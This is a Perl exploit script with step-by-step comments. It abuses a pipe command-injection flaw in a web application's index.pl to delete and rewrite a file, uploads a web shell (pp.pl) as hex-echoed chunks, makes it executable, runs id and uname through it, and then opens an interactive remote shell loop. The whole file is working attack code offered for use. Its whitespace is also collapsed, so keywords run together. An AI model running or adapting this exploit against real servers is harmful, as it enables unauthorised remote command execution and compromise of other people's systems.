#!/usr/bin/perl#oxagast# # __ _ _ __ ___ __ ____ ____ # / ( \/ )/ _\ / __)/ _\/ ___(_ _) # ( O ) (/ ( (_ / \___ \ )( # \__(_/\_\_/\_/\___\_/\_(____/(__) # useLWP::Simple;# Loads the downloading module from LWPuseList::MoreUtilsqw(natatime);# Loads the n at a time module from List MoreUtils$part1=@ARGV[0];$part2=@ARGV[1];# Sucks up all the arguments$lfn="./pp.pl";$rfn="pp.pl";$baseurl=$part1;$baseurl=~s/index.pl.*//;# get baseurl$stuff=get("$part1\|rm -f $rfn\|$part2");# Uses the pipe bug to remove the file if it's there so we can put new data in$buff="";# Initializes buffer$string="";# Initializes string where buffer will put intoopenFILEHANDLE,"<",$lfn;# Open the local file handle for readingbinmodeFILEHANDLE;# Make sure we open in binary modewhile(read(FILEHANDLE,$buff,1)){# Until the files over we read 1 character at a time into buffer and open loop$file.=$buff;# Stick it together into the string variable}# Close loopcloseFILEHANDLE;# Close the file because we are done reading it$unpacked=unpack("H*","$file");# Turns the file contense into a hexadecimal string$ib="";# ib is a space, just for a placeholder$unpacked=~s/(..)/$ib$1/g;# Globally search and replace putting a space between the hex$howmuch=256;# How many chars to try to send at once@hexxy=split("",$unpacked);# Split with the space between the hex codes to put each hexadecimal code # into the list$it=natatime$howmuch,@hexxy;# Initialize n at a time, making the itterator put howmuch chars (in hex) # into the new buffer at a timewhile(my@hex=$it->()){# Start the itterator and put it in the array called hexfor$hexer(0..scalar(@hex)-1){# For the itterator we have hexer as the count of 0 through 1 before the end of the hex list@hex[$hexer]=~s/(..)/\\\\x$1/;# put two backslashes and an x before the hex$hexstring=join"",@hex;# Put however many howmany hex codes in the string in the above format for echoif($hexstring=~m/\\x..$/g){# Since there is other crap in there, we have to get the last string in that # itteration that's in the right format at the end of the line# print "$hexstring"; # Print the hex codes it sentget("$part1\|echo -n -e $hexstring >> $rfn\|$part2");# Use a long get request, part1 being everything before where we would normally put # a pipe for command execution, then the echo command telling it no new lines and to # use hexadecimal, finally the last part of the address is put in, and it sends the # get request, and in doing so, echos in all our hex data}# Closes loop}# Closes loop}# closes itteratorget("$part1|chmod 0711 ./pp.pl|$part2");# Change perms$idstr=get($baseurl."pp.pl?cmd=id");# id$unstr=get($baseurl."pp.pl?cmd=uname -a");# uname$cwd=get($baseurl."pp.pl?cmd=pwd");# get current dirchomp($idstr);# cut some stuff off the endschomp($unstr);print$idstr.$unstr;#print id and uname -achomp($cwd);chomp($cwd);while($comm=<STDIN>){# get inputprint"$cwd\$";# fake $PS1chomp($comm);$content=get($baseurl."pp.pl?cmd=".$comm);# get outputchomp($content);print$content;# print it}# got shells?
